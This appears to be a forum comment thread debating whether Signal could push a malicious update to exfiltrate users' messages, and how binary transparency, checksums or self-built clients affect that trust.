There is a window of vulnerability between a theoretically malicious update being pushed and the security community noticing that it doesn't correspond to a build of the published source. That might only be a few hours, or even minutes - but milliseconds would be enough to do most of its work.
Correct me if I'm wrong here -- let's say the Signal folks are breached or have been secretly waiting for just the right moment to push out some malicious code. How would they coordinate rolling it out to client devices to take advantage of that gap? I mean, depending on what the exploit was, they might be able to whack some percentage of users -- but it would be caught fairly quickly. I'm curious what sort of attack you're theorizing that would be worthwhile here.
> it would be caught fairly quickly
Noticing something and reacting to it are very different things. Signal could fairly trivially grab all historical data for all online users within a fairly limited window. However it would be a one off event so the value proposition of such an act is dubious.
> fairly trivially
Show your working otherwise this is utterly spurious.
What is complicated about having the local client upload its database to a remote endpoint? It's literally opening a network connection and proceeding to write out a database dump to it.
Anyway the difficulty of the task itself is traditionally taken to be irrelevant when performing cryptographic threat analysis. The question is about what is and is not mathematically impossible for an adversary to do.
What's especially frustrating about all of these "Signal could flip a switch and steal everybody texts!" histrionics is that if they were interested in doing that they... wouldn't work at Signal. They'd go join/start the hundreds of other companies we've heard of in the past few years that have stored/leaked incredibly sensitive data with an insignificant fraction of the effort Signal have put in to establishing their credibility (the TeleMessage scandal being just the latest). People should hold Signal accountable, constantly, forever. But the baseless FUD is frankly hysterical from a forum of ostensible technologists.
This comment does not follow the context of the discussion.
Circling back up. Article author: Twitter might be untrustworthy and could bruteforce your keys. Use Signal.
Me: That's unreasonable. You also have to trust Signal.
Your answer just now: Why are people picking on Signal?!?
In fact, what the world really needs, rather than 3rd-party controlled encrypted messaging solutions like Twitter and Signal, is public apis for public key cryptography on non-trusted infrastructure, not tied to single groups. Everybody knows this. The reason that we instead have bodies like Signal -- a company that just so happens to tie every encrypted message to a real phone number and real human identity for no easily explained reason -- and the reason we have people who surely know better defending bodies like Signal in public, is an exercise left for the reader.
They control the update servers. So it's possible to target a single user with a single build that no one else ever sees. What percentage of users verify every release?
In theory, Binary Transparency (https://binary.transparency.dev/) solves that among other things. To pass verification, an update has to prove that it's included in a public log of releases.
But I guess Signal doesn't implement it?
It's distributed in the Play Store, so Google controls the update servers, no?
Edit: or Apple, whathaveyou
Sure, but only if you are blindly auto installing every update as soon as it is pushed. All you have to do to protect yourself is download the bundle, run a checksum and then install it.
Then you audit and build it on your own? Or implement your own client?
No free lunch. If comms security is that critical for you, outsourcing its assurance via trust is never going to cut it.